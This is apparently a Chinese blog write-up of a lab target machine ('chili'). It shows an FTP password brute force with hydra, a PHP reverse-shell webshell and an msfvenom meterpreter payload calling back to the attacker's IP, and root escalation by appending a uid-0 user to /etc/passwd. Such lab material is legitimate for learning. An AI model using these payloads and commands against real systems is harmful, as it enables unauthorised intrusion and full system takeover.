chili靶机

chilli

信息搜集

存活检测

image-20231002130359109

详细扫描

image-20231002130815050

后台扫描

image-20231002134943625

未发现后台

网页源代码查看

image-20231002135043312

未发现有用信息

ftp 密码爆破

  • 尝试用户名 chili 使用 hydra 对 ftp 进行密码爆破

    hydra -l chili -P /usr/share/wordlists/rockyou.txt ftp://192.168.245.130  -vV -I -f -t 64
    

    爆破出密码 a1b2c3d4

    image-20231002141119017

  • ftp 登录,搜集有用信息

    进入 /var/www/html 目录后发现具有读写执行最高权限的 .nano 目录

    image-20231002142133622

    尝试在目录中传入木马

webshell

方法1

  • 上传 webshell.php 文件到 .nano 目录下

    <?php
    $ip='192.168.245.128';
    $port=8888;
    $sock = fsockopen($ip, $port);
    $descriptorspec = array(
    0 => $sock,
    1 => $sock,
    2 => $sock
    );
    $process = proc_open('/bin/sh ' , $descriptorspec,$pipes);
    proc_close($process);
    
    put webshell /var/www/html/.nano
    
  • 赋权

    chmod 777 webshell.php
    
  • kali 开启 nc 监听

    nc -lvvp 8888
    
  • 浏览器输入 php 文件地址连接反弹 shell

    image-20231002144159373

    image-20231002144218579

方法2

  • 生成 php 木马

    msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.245.128 LPORT=8888 R>shell.php
    

    image-20231002143531403

  • 将木马上传到 .nano 目录下

    put shell.php /var/www/html/.nano
    

    image-20231002144739545

  • 赋权

    chmod 777 shell.php
    

    image-20231002144904074

  • kali 启动木马程序

    msfconsole
    
  • 配置攻击载荷

    use exploit/multi/handler
    set payload php/meterpreter/reverse_tcp
    set lhost=192.168.245.128
    set lport=8888
    run
    

    image-20231002145514719

    image-20231002145534541

  • 网页访问 192.168.245.128/.nano/shell.php

    image-20231002150645063

  • 连接成功

    image-20231002150722132

  • 输入 shell 获取 webshell

    image-20231002150850803

提权

  • 使用提权检测工具

    将检测工具下载到 kali,开启 http 服务

  • 在靶机上使用 weget 命令下载,赋权并运行漏洞检测脚本

    image-20231002153151432

    image-20231002153250020

  • 检测出漏洞,有对 passwd 文件的读写权限

    image-20231002153850487

  • 生成加密后的密码

    /usr/bin/perl -le 'print crypt("123","aa")'
    

    image-20231002161152319

    生成加密的密码 aamrgyQfDFSHw

  • 新建 root 用户

    echo 'gjl:aamrgyQfDFSHw:0:0:root:/root:/bin/bash' >> /etc/passwd
    

    image-20231002161431789

  • 登录新建的用户

    su gjl
    

    image-20231002161456158

提权成功

总结

  • 拥有 /etc/passwd 文件写入权限时,新建 root 用户

    加密密码可用 /usr/bin/perl -le 'print crypt("123","aa")' 计算

    其他版本 linux(kali)同样适用

    
    [外链图片转存中...(img-wQCb2ShY-1696401537110)]
    
    

提权成功

总结

  • 拥有 /etc/passwd 文件写入权限时,新建 root 用户

    加密密码可用 /usr/bin/perl -le 'print crypt("123","aa")' 计算

    其他版本 linux(kali)同样适用

  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

gjl_

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值